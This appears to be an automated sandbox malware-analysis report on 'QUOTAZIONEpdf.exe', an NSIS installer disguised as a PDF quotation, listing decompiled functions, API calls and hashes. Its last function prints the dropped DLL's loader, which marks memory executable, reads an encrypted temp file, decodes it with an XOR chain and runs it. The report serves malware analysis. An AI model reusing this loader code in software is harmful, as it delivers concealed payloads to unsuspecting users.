                							__eflags = _t62 == 1;
                							if(_t62 == 1) {
                								 *0x423f28 =  &( *0x423f28->dwLowDateTime);
                								L32:
                								_t49 = 0;
                								__eflags = 0;
                							} else {
                								_push(0x409b68);
                								_push(0xfffffffa);
                								E00404E23();
                								L29:
                								_t49 = 0x7fffffff;
                							}
                						}
                					}
                					L33:
                					return _t49;
                				}
                				E00404E23(0xffffffea,  *(_t85 - 8));
                				 *0x423f54 =  *0x423f54 + 1;
                				_t43 = E00402F01(_t77,  *((intOrPtr*)(_t85 - 0x1c)),  *(_t85 - 0x34), _t75, _t75); // executed
                				 *0x423f54 =  *0x423f54 - 1;
                				__eflags =  *(_t85 - 0x18) - 0xffffffff;
                				_t80 = _t43;
                				if( *(_t85 - 0x18) != 0xffffffff) {
                					L22:
                					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
                				} else {
                					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
                					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
                						goto L22;
                					}
                				}
                				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
                				__eflags = _t80 - _t75;
                				if(_t80 >= _t75) {
                					goto L31;
                				} else {
                					__eflags = _t80 - 0xfffffffe;
                					if(_t80 != 0xfffffffe) {
                						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffee);
                					} else {
                						E00405AA7(_t75, _t80, 0x409b68, 0x409b68, 0xffffffe9);
                						lstrcatA(0x409b68,  *(_t85 - 8));
                					}
                					_push(0x200010);
                					_push(0x409b68);
                					E00405346();
                					goto L29;
                				}
                				goto L33;
                			}


                APIs
                • lstrcatA.KERNEL32(00000000,00000000,afqfmqnwor,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401773
                • CompareFileTime.KERNEL32(-00000014,?,afqfmqnwor,afqfmqnwor,00000000,00000000,afqfmqnwor,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 0040179D
                  • Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,004236A0,NSIS Error), ref: 00405A92
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp$C:\Users\user\AppData\Local\Temp\nsr3B6B.tmp\tncvu.dll$afqfmqnwor
                • API String ID: 1941528284-4261118648
                • Opcode ID: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                • Instruction ID: c3a7f6530b99602e8ac3371ca3d410005e8cb954db153f1edc9c693d5e31c606
                • Opcode Fuzzy Hash: ba0b5d2c7ef09039fa2985dd5c3eead3d8f39d7c1153f1f4a7a5f687554637de
                • Instruction Fuzzy Hash: 4541AD31A00515BACB10BBB5DD86DAF3679EF45369B20433BF511B20E1D77C8A418EAE
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 385 402f01-402f10 386 402f12-402f28 SetFilePointer 385->386 387 402f2e-402f39 call 40302c 385->387 386->387 390 403025-403029 387->390 391 402f3f-402f59 ReadFile 387->391 392 403022 391->392 393 402f5f-402f62 391->393 395 403024 392->395 393->392 394 402f68-402f7b call 40302c 393->394 394->390 398 402f81-402f84 394->398 395->390 399 402ff1-402ff7 398->399 400 402f86-402f89 398->400 401 402ff9 399->401 402 402ffc-40300f ReadFile 399->402 403 40301d-403020 400->403 404 402f8f 400->404 401->402 402->392 405 403011-40301a 402->405 403->390 406 402f94-402f9c 404->406 405->403 407 402fa1-402fb3 ReadFile 406->407 408 402f9e 406->408 407->392 409 402fb5-402fb8 407->409 408->407 409->392 410 402fba-402fcf WriteFile 409->410 411 402fd1-402fd4 410->411 412 402fed-402fef 410->412 411->412 413 402fd6-402fe9 411->413 412->395 413->406 414 402feb 413->414 414->403
                C-Code - Quality: 93%
                			E00402F01(void* __ecx, void _a4, void* _a8, void* _a12, long _a16) {
                				long _v8;
                				intOrPtr _v12;
                				void _t31;
                				intOrPtr _t32;
                				int _t35;
                				long _t36;
                				int _t37;
                				long _t38;
                				int _t40;
                				int _t42;
                				long _t43;
                				long _t44;
                				long _t55;
                				long _t57;
                
                				_t31 = _a4;
                				if(_t31 >= 0) {
                					_t44 = _t31 +  *0x423ef8;
                					 *0x41703c = _t44;
                					SetFilePointer( *0x409014, _t44, 0, 0); // executed
                				}
                				_t57 = 4;
                				_t32 = E0040302C(_t57);
                				if(_t32 >= 0) {
                					_t35 = ReadFile( *0x409014,  &_a4, _t57,  &_v8, 0); // executed
                					if(_t35 == 0 || _v8 != _t57) {
                						L23:
                						_push(0xfffffffd);
                						goto L24;
                					} else {
                						 *0x41703c =  *0x41703c + _t57;
                						_t32 = E0040302C(_a4);
                						_v12 = _t32;
                						if(_t32 >= 0) {
                							if(_a12 != 0) {
                								_t36 = _a4;
                								if(_t36 >= _a16) {
                									_t36 = _a16;
                								}
                								_t37 = ReadFile( *0x409014, _a12, _t36,  &_v8, 0); // executed
                								if(_t37 == 0) {
                									goto L23;
                								} else {
                									_t38 = _v8;
                									 *0x41703c =  *0x41703c + _t38;
                									_v12 = _t38;
                									goto L22;
                								}
                							} else {
                								if(_a4 <= 0) {
                									L22:
                									_t32 = _v12;
                								} else {
                									while(1) {
                										_t55 = 0x4000;
                										if(_a4 < 0x4000) {
                											_t55 = _a4;
                										}
                										_t40 = ReadFile( *0x409014, 0x413038, _t55,  &_v8, 0); // executed
                										if(_t40 == 0 || _t55 != _v8) {
                											goto L23;
                										}
                										_t42 = WriteFile(_a8, 0x413038, _v8,  &_a16, 0); // executed
                										if(_t42 == 0 || _a16 != _t55) {
                											_push(0xfffffffe);
                											L24:
                											_pop(_t32);
                										} else {
                											_t43 = _v8;
                											_v12 = _v12 + _t43;
                											_a4 = _a4 - _t43;
                											 *0x41703c =  *0x41703c + _t43;
                											if(_a4 > 0) {
                												continue;
                											} else {
                												goto L22;
                											}
                										}
                										goto L25;
                									}
                									goto L23;
                								}
                							}
                						}
                					}
                				}
                				L25:
                				return _t32;
                			}


                APIs
                • SetFilePointer.KERNELBASE(00409128,00000000,00000000,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402F28
                • ReadFile.KERNELBASE(00409128,00000004,?,00000000,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000,00000000,00409128), ref: 00402F55
                • ReadFile.KERNELBASE(00413038,00004000,?,00000000,00409128,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FAF
                • WriteFile.KERNELBASE(00000000,00413038,?,000000FF,00000000,?,00402EAD,000000FF,00000000,00000000,00409128,?), ref: 00402FC7
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$Read$PointerWrite
                • String ID: 80A
                • API String ID: 2113905535-195308239
                • Opcode ID: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                • Instruction ID: 41b23491bffeaa1753be022b97a7ffae9df7beca0cc47644b0b6bde15745b2e9
                • Opcode Fuzzy Hash: 1d0c5bb9ecfe910818843e6bf7809c02e5eaef0b1ff428f1de7b4674f3045140
                • Instruction Fuzzy Hash: 91310B31901209EFDF21CF55DE84DAE7BB8EB453A5F20403AF504E61E0D2749E41EB69
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                control_flow_graph 415 40302c-403055 GetTickCount 416 403196-40319e call 402bc5 415->416 417 40305b-403086 call 4031da SetFilePointer 415->417 422 4031a0-4031a5 416->422 423 40308b-40309d 417->423 424 4030a1-4030af call 4031a8 423->424 425 40309f 423->425 428 4030b5-4030c1 424->428 429 403188-40318b 424->429 425->424 430 4030c7-4030cd 428->430 429->422 431 4030f8-403114 call 405e9d 430->431 432 4030cf-4030d5 430->432 437 403191 431->437 438 403116-40311e 431->438 432->431 433 4030d7-4030f7 call 402bc5 432->433 433->431 442 403193-403194 437->442 440 403120-403136 WriteFile 438->440 441 403152-403158 438->441 443 403138-40313c 440->443 444 40318d-40318f 440->444 441->437 445 40315a-40315c 441->445 442->422 443->444 446 40313e-40314a 443->446 444->442 445->437 447 40315e-403171 445->447 446->430 448 403150 446->448 447->423 449 403177-403186 SetFilePointer 447->449 448->447 449->416
                C-Code - Quality: 94%
                			E0040302C(intOrPtr _a4) {
                				long _v4;
                				void* __ecx;
                				intOrPtr _t12;
                				intOrPtr _t13;
                				signed int _t14;
                				void* _t16;
                				void* _t17;
                				long _t18;
                				int _t21;
                				intOrPtr _t22;
                				intOrPtr _t34;
                				long _t35;
                				intOrPtr _t37;
                				void* _t39;
                				long _t40;
                				intOrPtr _t53;
                
                				_t35 =  *0x41703c; // 0x3d33f
                				_t37 = _t35 -  *0x40afa8 + _a4;
                				 *0x423eac = GetTickCount() + 0x1f4;
                				if(_t37 <= 0) {
                					L23:
                					E00402BC5(1);
                					return 0;
                				}
                				E004031DA( *0x41f04c);
                				SetFilePointer( *0x409014,  *0x40afa8, 0, 0); // executed
                				 *0x41f048 = _t37;
                				 *0x417038 = 0;
                				while(1) {
                					_t12 =  *0x417040; // 0x3d2e5
                					_t34 = 0x4000;
                					_t13 = _t12 -  *0x41f04c;
                					if(_t13 <= 0x4000) {
                						_t34 = _t13;
                					}
                					_t14 = E004031A8(0x413038, _t34); // executed
                					if(_t14 == 0) {
                						break;
                					}
                					 *0x41f04c =  *0x41f04c + _t34;
                					 *0x40afc8 = 0x413038;
                					 *0x40afcc = _t34;
                					L6:
                					if( *0x423eb0 != 0 &&  *0x423f40 == 0) {
                						_t22 =  *0x41f048; // 0x31e57
                						 *0x417038 = _t22 -  *0x41703c - _a4 +  *0x40afa8;
                						E00402BC5(0);
                					}
                					 *0x40afd0 = 0x40b038;
                					 *0x40afd4 = 0x8000; // executed
                					_t16 = E00405E9D(0x40afb0); // executed
                					if(_t16 < 0) {
                						goto L21;
                					}
                					_t39 =  *0x40afd0; // 0x40e15a
                					_t40 = _t39 - 0x40b038;
                					if(_t40 == 0) {
                						__eflags =  *0x40afcc; // 0x0
                						if(__eflags != 0) {
                							goto L21;
                						}
                						__eflags = _t34;
                						if(_t34 == 0) {
                							goto L21;
                						}
                						L17:
                						_t18 =  *0x41703c; // 0x3d33f
                						if(_t18 -  *0x40afa8 + _a4 > 0) {
                							continue;
                						}
                						SetFilePointer( *0x409014, _t18, 0, 0); // executed
                						goto L23;
                					}
                					_t21 = WriteFile( *0x409014, 0x40b038, _t40,  &_v4, 0); // executed
                					if(_t21 == 0 || _t40 != _v4) {
                						_push(0xfffffffe);
                						L22:
                						_pop(_t17);
                						return _t17;
                					} else {
                						 *0x40afa8 =  *0x40afa8 + _t40;
                						_t53 =  *0x40afcc; // 0x0
                						if(_t53 != 0) {
                							goto L6;
                						}
                						goto L17;
                					}
                					L21:
                					_push(0xfffffffd);
                					goto L22;
                				}
                				return _t14 | 0xffffffff;
                			}


                APIs
                • GetTickCount.KERNEL32 ref: 00403041
                  • Part of subcall function 004031DA: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8
                • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?,?,00402EAD,000000FF,00000000), ref: 00403074
                • WriteFile.KERNELBASE(0040B038,0040E15A,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 0040312E
                • SetFilePointer.KERNELBASE(0003D33F,00000000,00000000,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000,00000000,?,?), ref: 00403180
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: File$Pointer$CountTickWrite
                • String ID: 80A$Z@
                • API String ID: 2146148272-2640753336
                • Opcode ID: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                • Instruction ID: 8653c145dc750015188d6a9afa30315cb9c5a6a6900809742879fa1bd1138a56
                • Opcode Fuzzy Hash: 492b146ea58c14309b76aad4efb9c222274e911e7d047196bd2092e933975ded
                • Instruction Fuzzy Hash: 74417FB2504302AFD7109F19EE8496A3FBCF748396710813BE511B62F1C7386A559BAE
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 450 401f51-401f5d 451 401f63-401f79 call 4029e8 * 2 450->451 452 40200b-40200d 450->452 461 401f88-401f96 LoadLibraryExA 451->461 462 401f7b-401f86 GetModuleHandleA 451->462 453 402156-40215b call 401423 452->453 459 40287d-40288c 453->459 464 401f98-401fa6 GetProcAddress 461->464 465 402004-402006 461->465 462->461 462->464 467 401fe5-401fea call 404e23 464->467 468 401fa8-401fae 464->468 465->453 473 401fef-401ff2 467->473 469 401fb0-401fbc call 401423 468->469 470 401fc7-401fde call 72fb10a0 468->470 469->473 478 401fbe-401fc5 469->478 476 401fe0-401fe3 470->476 473->459 474 401ff8-401fff FreeLibrary 473->474 474->459 476->473 478->473
                C-Code - Quality: 57%
                			E00401F51(void* __ebx, void* __eflags) {
                				struct HINSTANCE__* _t18;
                				struct HINSTANCE__* _t25;
                				void* _t26;
                				struct HINSTANCE__* _t29;
                				CHAR* _t31;
                				intOrPtr* _t32;
                				void* _t33;
                
                				_t26 = __ebx;
                				asm("sbb eax, 0x423f58");
                				 *(_t33 - 4) = 1;
                				if(__eflags < 0) {
                					_push(0xffffffe7);
                					L14:
                					E00401423();
                					L15:
                					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
                					return 0;
                				}
                				_t31 = E004029E8(0xfffffff0);
                				 *(_t33 + 8) = E004029E8(1);
                				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
                					L3:
                					_t18 = LoadLibraryExA(_t31, _t26, 8); // executed
                					_t29 = _t18;
                					if(_t29 == _t26) {
                						_push(0xfffffff6);
                						goto L14;
                					}
                					L4:
                					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                					if(_t32 == _t26) {
                						E00404E23(0xfffffff7,  *(_t33 + 8));
                					} else {
                						 *(_t33 - 4) = _t26;
                						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B"); // executed
                						} else {
                							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                							if( *_t32() != 0) {
                								 *(_t33 - 4) = 1;
                							}
                						}
                					}
                					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                						FreeLibrary(_t29);
                					}
                					goto L15;
                				}
                				_t25 = GetModuleHandleA(_t31); // executed
                				_t29 = _t25;
                				if(_t29 != __ebx) {
                					goto L4;
                				}
                				goto L3;
                			}











                APIs
                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                  • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                  • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                  • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
                  • Part of subcall function 00404E23: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF
                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                • String ID: ?B
                • API String ID: 2987980305-117478770
                • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 480 4015b3-4015c6 call 4029e8 call 40560c 485 4015c8-4015e3 call 4055a3 CreateDirectoryA 480->485 486 40160a-40160d 480->486 495 401600-401608 485->495 496 4015e5-4015f0 GetLastError 485->496 487 40162d-40215b call 401423 486->487 488 40160f-401628 call 401423 call 405a85 SetCurrentDirectoryA 486->488 502 40287d-40288c 487->502 488->502 495->485 495->486 499 4015f2-4015fb GetFileAttributesA 496->499 500 4015fd 496->500 499->495 499->500 500->495
                C-Code - Quality: 85%
                			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                				struct _SECURITY_ATTRIBUTES** _t10;
                				int _t19;
                				struct _SECURITY_ATTRIBUTES* _t20;
                				signed char _t22;
                				struct _SECURITY_ATTRIBUTES* _t23;
                				CHAR* _t25;
                				struct _SECURITY_ATTRIBUTES** _t29;
                				void* _t30;
                
                				_t23 = __ebx;
                				_t25 = E004029E8(0xfffffff0);
                				_t10 = E0040560C(_t25);
                				_t27 = _t10;
                				if(_t10 != __ebx) {
                					do {
                						_t29 = E004055A3(_t27, 0x5c);
                						 *_t29 = _t23;
                						 *((char*)(_t30 + 0xb)) =  *_t29;
                						_t19 = CreateDirectoryA(_t25, _t23); // executed
                						if(_t19 == 0) {
                							if(GetLastError() != 0xb7) {
                								L4:
                								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                							} else {
                								_t22 = GetFileAttributesA(_t25); // executed
                								if((_t22 & 0x00000010) == 0) {
                									goto L4;
                								}
                							}
                						}
                						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                						 *_t29 = _t20;
                						_t27 =  &(_t29[0]);
                					} while (_t20 != _t23);
                				}
                				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                					_push(0xfffffff5);
                					E00401423();
                				} else {
                					E00401423(0xffffffe6);
                					E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t25);
                					SetCurrentDirectoryA(_t25); // executed
                				}
                				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
                				return 0;
                			}












                APIs
                  • Part of subcall function 0040560C: CharNextA.USER32(004053BE,?,004218A0,00000000,00405670,004218A0,004218A0,?,?,74E5F560,004053BE,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 0040561A
                  • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040561F
                  • Part of subcall function 0040560C: CharNextA.USER32(00000000), ref: 0040562E
                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                Strings
                • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                • String ID: C:\Users\user\AppData\Local\Temp
                • API String ID: 3751793516-501415292
                • Opcode ID: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                • Instruction ID: 11ba4fe5436512bc7837d50811c3794abd92905400bb47a2e3f09ad75438aea6
                • Opcode Fuzzy Hash: b22028777b76ff0adb18f2892ab6001a383c6b987e8d30e1b3724520259a3699
                • Instruction Fuzzy Hash: B3010431908150AFDB116FB51D44D7F67B0AA56365768073BF491B22E2C63C4942D62E
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 505 40578b-405795 506 405796-4057c0 GetTickCount GetTempFileNameA 505->506 507 4057c2-4057c4 506->507 508 4057cf-4057d1 506->508 507->506 509 4057c6 507->509 510 4057c9-4057cc 508->510 509->510
                C-Code - Quality: 100%
                			E0040578B(char _a4, intOrPtr _a6, CHAR* _a8) {
                				signed int _t11;
                				int _t14;
                				signed int _t16;
                				void* _t19;
                				CHAR* _t20;
                
                				_t20 = _a4;
                				_t19 = 0x64;
                				while(1) {
                					_t19 = _t19 - 1;
                					_a4 = 0x61736e;
                					_t11 = GetTickCount();
                					_t16 = 0x1a;
                					_a6 = _a6 + _t11 % _t16;
                					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                					if(_t14 != 0) {
                						break;
                					}
                					if(_t19 != 0) {
                						continue;
                					}
                					 *_t20 =  *_t20 & 0x00000000;
                					return _t14;
                				}
                				return _t20;
                			}









                APIs
                • GetTickCount.KERNEL32 ref: 0040579E
                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 004057B8
                Strings
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: CountFileNameTempTick
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                • API String ID: 1716503409-1349037682
                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                • Instruction ID: 4fcdc00fff711095840056c8ed2a58f2bfde19b521d5dac465ae6a1bf3f6778c
                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                • Instruction Fuzzy Hash: F9F0A736348304B6D7104E55DC04B9B7F69DF91750F14C02BFA449B1C0D6B0995497A5
                Uniqueness

                Uniqueness Score: -1.00%

                Control-flow Graph

                C-Code - Quality: 76%
                			E72FB10A0(void* __ecx, void* __eflags) {
                				short _v8;
                				short _v10;
                				short _v12;
                				short _v14;
                				short _v16;
                				short _v18;
                				short _v20;
                				short _v22;
                				short _v24;
                				short _v26;
                				char _v28;
                				void* _v32;
                				long _v36;
                				long _v40;
                				short _v1080;
                				void _v6216;
                				void* _t38;
                				intOrPtr _t41;
                				struct _OVERLAPPED* _t65;
                				void* _t74;
                
                				E72FB1000(0x1844, __ecx);
                				_v28 = 0x70;
                				_v26 = 0x64;
                				_v24 = 0x71;
                				_v22 = 0x6c;
                				_v20 = 0x72;
                				_v18 = 0x75;
                				_v16 = 0x6e;
                				_v14 = 0x72;
                				_v12 = 0x63;
                				_v10 = 0x6d;
                				_v8 = 0;
                				GetTempPathW(0x103,  &_v1080);
                				E72FB1030( &_v1080,  &_v28);
                				VirtualProtect( &_v6216, 0x1410, 0x40,  &_v36); // executed
                				_t38 = CreateFileW( &_v1080, 0x80000000, 7, 0, 3, 0x80, 0); // executed
                				_v32 = _t38;
                				ReadFile(_v32,  &_v6216, 0x1410,  &_v40, 0); // executed
                				_t65 = 0;
                				while(1) {
                					_t41 =  *((intOrPtr*)(_t74 + _t65 - 0x1844));
                					if(_t65 == 0x1410) {
                						break;
                					}
                					 *((char*)(_t74 + _t65 - 0x1844)) = ((_t41 + 2 ^ 0x00000005) - 0xffffffffffffff18 + 0x9c - 0xffffffffffffffb1 + 0x000000a0 ^ 0x00000018) + 0x26;
                					_t65 =  &(_t65->Internal);
                				}
                				_v6216();
                				return 0;
                			}
























                APIs
                • GetTempPathW.KERNEL32(00000103,?), ref: 72FB1119
                • VirtualProtect.KERNELBASE(?,00001410,00000040,?), ref: 72FB1144
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 72FB1163
                • ReadFile.KERNELBASE(?,?,00001410,?,00000000), ref: 72FB1182
                Memory Dump Source
                • Source File: 00000001.00000002.301006655.0000000072FB1000.00000020.00020000.sdmp, Offset: 72FB0000, based on PE: true
                • Associated: 00000001.00000002.300992068.0000000072FB0000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.301011867.0000000072FB2000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_72fb0000_QUOTAZIONEpdf.jbxd
                Similarity
